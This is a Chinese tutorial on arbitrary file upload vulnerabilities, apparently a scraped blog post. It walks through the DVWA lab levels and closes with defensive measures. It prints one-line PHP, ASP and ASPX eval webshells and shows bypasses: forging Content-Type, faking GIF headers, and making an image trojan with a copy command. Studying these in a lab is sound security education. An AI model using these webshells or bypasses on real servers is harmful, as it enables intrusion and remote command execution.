当前位置: 首页 > news >正文

网站里网格怎么做装饰设计公司资质

网站里网格怎么做,装饰设计公司资质,域名出售后被用来做非法网站,上海网站备案人工服务器文章目录 1、任意文件上传概述1.1、漏洞成因1.2、漏洞危害 2、WebShell解析2.1、Shell2.2、WebShell2.2.1、大马2.2.2、小马2.2.3、GetShell 3、任意文件上传攻防3.1、毫无检测3.1.1、源代码3.1.2、代码审计3.1.3、靶场试炼 3.2、黑白名单策略3.2.1、文件检测3.2.2、后缀名黑名… 文章目录 1、任意文件上传概述1.1、漏洞成因1.2、漏洞危害 2、WebShell解析2.1、Shell2.2、WebShell2.2.1、大马2.2.2、小马2.2.3、GetShell 3、任意文件上传攻防3.1、毫无检测3.1.1、源代码3.1.2、代码审计3.1.3、靶场试炼 3.2、黑白名单策略3.2.1、文件检测3.2.2、后缀名黑名单3.2.3、后缀名白名单 3.3、文件类型检测3.3.1、源代码3.3.2、代码审计3.3.3、靶场 试炼 3.4、文件名、后缀名或检测内容3.4.1、源代码3.4.2、代码审计3.4.3、靶场试炼3.4.4、文件幻数 3.5、图片木马3.5.1、使用CMD命令3.5.2靶场High级别试炼 3.6、完全防御3.6.1、源代码3.6.2、代码审计 3.7、文件上传利用条件3.8、任意文件上传防御3.8.1、代码角度3.8.2、业务角度3.8.3、Web容器角度3.8.4、系统角度3.8.5、服务器部署 4、c0ny1/upload-labs靶场 1、任意文件上传概述 文件上传是web应用必备功能之一如头像上传附件分享登如果服务器配置不当或者 没有进行足够的过滤Web用户就可以上传任意文件包括恶意脚本文件exe 程序等等这就造成了任意文件上传漏洞 1.1、漏洞成因 服务器配置不当开启了PUT 方法 Web 应用开放了文件上传功能没有对上传的文件做足够的限制和过滤 在程序开发部署时没有考虑以下因素导致限制被绕过 代码特性组件漏洞Web 容器漏洞系统特性;… 1.2、漏洞危害 上传恶意代码文件程序并执行恶意代码文件程序 直接上传后门文件并执行导致网站沦陷通过恶意文件利用其他漏洞拿到管理员权限提权导致服务器沦陷。 通过文件上传漏洞获得的网站后门叫WebShell 2、WebShell解析 2.1、Shell 也叫命令解释器 WindowsLinuxpowershellbashcmdsh…zsh… 2.2、WebShell WebShell 是一个网站的后门也是一个命令解释器。通过Web 方式使用HTTP| HTTPS 协议传递命令消息到服务器并且继承了Web 用户的权限在服务器上远程执行命令。WebShell 从本质上讲就是服务器端可运行的脚本文件后缀名通常为 .php.asp.aspx.jsp.jspx… WebShell 接收来自于Web 用户的命令然后在服务器端执行也称为网站木马、木马后门、网马登 Web容器脚本语言Apache HTTPDphpIISasp、aspx、phpTomcatjsp、jspx 2.2.1、大马 代码量比较大相对于一句话木马 2.2.2、小马 一句话木马需要与中国蚁剑配合。 特点短小精悍功能强大。 蚁剑三大基本功能文件管理、虚拟终端、数据库管理 php脚本格式 ?php eval($_REQUEST[777])? //代码执行函数传参点asp脚本格式 %eval request(777)%aspx脚本格式 % Page LanguageJscript% %eval(Request.Item[777],unsafe);%2.2.3、GetShell GetShell 是获取WebShell 的过程或结果。文件上传漏洞的利用是GetShell 的主要方式但不是唯一手段。 3、任意文件上传攻防 以DVWA靶场为例 下载地址 配置教程 可以到网上搜 3.1、毫无检测 DVWA/File Upload/Low级别 3.1.1、源代码 ?phpif( isset( $_POST[ Upload ] ) ) {// Where are we going to be writing to?$target_path DVWA_WEB_PAGE_TO_ROOT . hackable/uploads/;$target_path . basename( $_FILES[ uploaded ][ name ] );// Can we move the file to the upload folder?if( !move_uploaded_file( $_FILES[ uploaded ][ tmp_name ], $target_path ) ) {// Noecho preYour image was not uploaded./pre;}else {// Yes!echo pre{$target_path} succesfully uploaded!/pre;} }? 3.1.2、代码审计 对文件上传没有做任何过滤任意文件上传 核心函数 move_uploaded_file 将上传的文件移动到$target_path里3.1.3、靶场试炼 直接上传一句话木马1.php ?php eval($_REQUEST[6868])?上传的路径http://192.168.80.139/DVWA-2.0.1/hackable/uploads/1.php 使用WebShell管理工具连接 进入目录管理 3.2、黑白名单策略 黑白名单是最常用也是最重要的安全策略之一。黑白名单策略类似于一个列表列表中写了一些条件或者规则黑名单就是非法条件白名单就是合法条件类似于手机的黑白名单。也是最常用的防御策略之一 3.2.1、文件检测 文件后缀名文件类型文件内容 3.2.2、后缀名黑名单 $deny_ext array(.php,.php5,.php4,.php3,.php2,php1,.phtml,.pht,.html,.htm,.jsp,.jspa,.jspx,.jsw,.jsv,.jspf,.jhtml,.asp,.aspx,.asa,.asax,.ascx,.ashx,.asmx,.cer,.swf,.htaccess );3.2.3、后缀名白名单 $allow_ext array(jpg,jpeg,png,bmp,gif,svg,zip,tar.gz,doc,docx,pdf,xls,ppt );3.3、文件类型检测 DVWA/File Upload/Medium级别 3.3.1、源代码 ?phpif( isset( $_POST[ Upload ] ) ) {// Where are we going to be writing to?$target_path DVWA_WEB_PAGE_TO_ROOT . hackable/uploads/;$target_path . basename( $_FILES[ uploaded ][ name ] );// File information$uploaded_name $_FILES[ uploaded ][ name ];$uploaded_type $_FILES[ uploaded ][ type ];$uploaded_size $_FILES[ uploaded ][ size ];// Is it an image?if( ( $uploaded_type image/jpeg || $uploaded_type image/png ) ( $uploaded_size 100000 ) ) {// Can we move the file to the upload folder?if( !move_uploaded_file( $_FILES[ uploaded ][ tmp_name ], $target_path ) ) {// Noecho preYour image was not uploaded./pre;}else {// Yes!echo pre{$target_path} succesfully uploaded!/pre;}}else {// Invalid fileecho preYour image was not uploaded. We can only accept JPEG or PNG images./pre;} }? 3.3.2、代码审计 上传的文件没有重命名Content-Type 类型白名单检测任意文件上传 上传的文件类型必须是image/jpeg或者image/png3.3.3、靶场 试炼 继续上传1.php发现对上传的文件后缀做了限制 使用bp抓取数据包 修改文件后缀为2.png上传失败说明关键点不在图片的后缀名 修改文件类型Content-Type:image/png上传成功 3.4、文件名、后缀名或检测内容 DVWA/File Upload/High级别 3.4.1、源代码 ?phpif( isset( $_POST[ Upload ] ) ) {// Where are we going to be writing to?$target_path DVWA_WEB_PAGE_TO_ROOT . hackable/uploads/;$target_path . basename( $_FILES[ uploaded ][ name ] );// File information$uploaded_name $_FILES[ uploaded ][ name ];$uploaded_ext substr( $uploaded_name, strrpos( $uploaded_name, . ) 1);$uploaded_size $_FILES[ uploaded ][ size ];$uploaded_tmp $_FILES[ uploaded ][ tmp_name ];// Is it an image?if( ( strtolower( $uploaded_ext ) jpg || strtolower( $uploaded_ext ) jpeg || strtolower( $uploaded_ext ) png ) ( $uploaded_size 100000 ) getimagesize( $uploaded_tmp ) ) {// Can we move the file to the upload folder?if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {// Noecho preYour image was not uploaded./pre;}else {// Yes!echo pre{$target_path} succesfully uploaded!/pre;}}else {// Invalid fileecho preYour image was not uploaded. We can only accept JPEG or PNG images./pre;} }? 3.4.2、代码审计 上传文件没有重命名文件后缀名白名单检测使用getimagesize() 进行文件内容检测只检测文件头部 3.4.3、靶场试炼 继续上传一句话木马1.php上传失败使用bp抓取数据包 发现对文件后缀文件类型文件内容都做了限制 在文件内容处加上图片的头部标识GIF8a 3.4.4、文件幻数 只要是JPG文件那么该文件的十六进制头部就是FF D8 FF E0 … 图片头部验证 hexdump 1.jpg3.5、图片木马 3.5.1、使用CMD命令 copy imgName/byjh/a newImgNamecopy 1.png/b1.php/a 2.png说明 图片木马没有办法直接利用需要配合其他漏洞图片木马中包含了恶意代码 3.5.2靶场High级别试炼 准备一张小一点的图片1.jpg还有一句话木马1.php ?php eval($_REQUEST[6868])?使用cmd命令将图片和代码合成一个文件 copy 1.jpg/b1.php/a 2.jpg上传2.jpg 上传成功 如果想要访问的话需要和其他漏洞一起使用 DVWA File Upload相关博客 Pikachu靶场 Unsafe upfileupload ||||||||||||||||getimagesize这关提供了两个方式方式一制作图片头部表示方式二使用cmd命令制作 图片木马 3.6、完全防御 DVWA/File Upload/Impossible级别 3.6.1、源代码 ?phpif( isset( $_POST[ Upload ] ) ) {// Check Anti-CSRF tokencheckToken( $_REQUEST[ user_token ], $_SESSION[ session_token ], index.php );// File information$uploaded_name $_FILES[ uploaded ][ name ];$uploaded_ext substr( $uploaded_name, strrpos( $uploaded_name, . ) 1);$uploaded_size $_FILES[ uploaded ][ size ];$uploaded_type $_FILES[ uploaded ][ type ];$uploaded_tmp $_FILES[ uploaded ][ tmp_name ];// Where are we going to be writing to?$target_path DVWA_WEB_PAGE_TO_ROOT . hackable/uploads/;//$target_file basename( $uploaded_name, . . $uploaded_ext ) . -;$target_file md5( uniqid() . $uploaded_name ) . . . $uploaded_ext;$temp_file ( ( ini_get( upload_tmp_dir ) ) ? ( sys_get_temp_dir() ) : ( ini_get( upload_tmp_dir ) ) );$temp_file . DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . . . $uploaded_ext;// Is it an image?if( ( strtolower( $uploaded_ext ) jpg || strtolower( $uploaded_ext ) jpeg || strtolower( $uploaded_ext ) png ) ( $uploaded_size 100000 ) ( $uploaded_type image/jpeg || $uploaded_type image/png ) getimagesize( $uploaded_tmp ) ) {// Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)if( $uploaded_type image/jpeg ) {$img imagecreatefromjpeg( $uploaded_tmp );imagejpeg( $img, $temp_file, 100);}else {$img imagecreatefrompng( $uploaded_tmp );imagepng( $img, $temp_file, 9);}imagedestroy( $img );// Can we move the file to the web root from the temp folder?if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {// Yes!echo prea href${target_path}${target_file}${target_file}/a succesfully uploaded!/pre;}else {// Noecho preYour image was not uploaded./pre;}// Delete any temp filesif( file_exists( $temp_file ) )unlink( $temp_file );}else {// Invalid fileecho preYour image was not uploaded. We can only accept JPEG or PNG images./pre;} }// Generate Anti-CSRF token generateSessionToken();? 3.6.2、代码审计 检测Token 值防止数据包重放文件重命名文件后缀名白名单检测文件类型白名单检测文件内容头部检测二次渲染生成新文件删除缓存文件 3.7、文件上传利用条件 文件上传漏洞完美利用受到以下条件限制 Web 服务器开启文件上传功能Web 用户可以使用该功能Web 用户对目标目录具有可写权限甚至具有执行权限。一般情况下Web 目录都有执行权限完美利用意味着文件可以执行也就是说代码可以被服务器解析服务器开启了PUT 方法 3.8、任意文件上传防御 3.8.1、代码角度 采用白名单策略严格限制上传文件的后缀名上传文件重命名尽量少的从客户端获取信息包括文件名、文件类型、文件内容等文件内容检测进行二次渲染过滤掉图片马中的恶意代码避免文件包含漏洞严格处理文件路径防御00 截断漏洞检测Token 值防止数据包重放 3.8.2、业务角度 强口令策略避免恶意攻击者登录网站后台尽量避免Web 用户修改上传白名单 3.8.3、Web容器角度 及时更新Web 容器防止解析漏洞产生。禁用Web 容器PUT 方法 现在的服务器已经把PUT方法关闭掉了 但是也需要知道有这么个东西 3.8.4、系统角度 避开空格、点 . 、 ::$DATA 等系统特性 linux系统下是允许文件名末尾存在 空格的 3.8.5、服务器部署 严格控制权限执行权限与写权限分离。建立单独的文件存储服务器类似于站库分离 4、c0ny1/upload-labs靶场 c0ny1/upload-labs-github地址 下载地址
http://www.yutouwan.com/news/11501/

相关文章:

  • 天津市设计网站的公司那个网站可以帮助做数学题
  • 吴桥网站建设游戏seo推广
  • 做ps兼职的网站一个云主机怎么挂两个网站
  • 网站排名的重要性成都百度公司怎么样
  • 成都网站开发团队巩义市网站建设培训班
  • 宁波做公司网站公司微信开发者工具下载官网下载
  • 查网站是否正规石家庄搭建网站
  • 一流的嘉兴网站建设有创意的公司名字
  • 网络文学网站开发网站建设百度推广总结
  • 泰安网站建设推广优化个人网站首页内容
  • 什么网站可以免费发广告网站建设都用哪些软件
  • 网站没内容wordpress笔记主题
  • 博乐建设工程信息网站如何运营垂直网站
  • 商品网站怎么做google优化排名
  • 合肥网络公司seo建站织梦教程网
  • 额敏网站建设网络服务提供者知道或者应当知道网络用户
  • 吴江seo网站优化软件医院网站建设与管理ppt
  • dw网站模版pmp培训
  • 农业基本建设项目信息网站产品推广方式
  • 网站建设手机版js网站建设
  • 一键网站建设建筑工程网官网平台
  • 微餐饮网站建设平台用哪个网站做相册视频
  • 迅速提高网站排名网站建成后 再添加小功能麻烦吗
  • 旅游网网站建设的管理财务公司
  • 顺德网站制作案例信息河南网站seo费用
  • 网站建设首选-云端高科建设网企业沟通平台
  • 企业网站设计费做哪个科目织梦网站模板怎么做
  • 杭州电商网站平台开发公司django做的电子商务网站
  • 关键词排名优化网站建设公司哪家好网站建设项目分析
  • 如何编辑网站后台职业做网站游戏的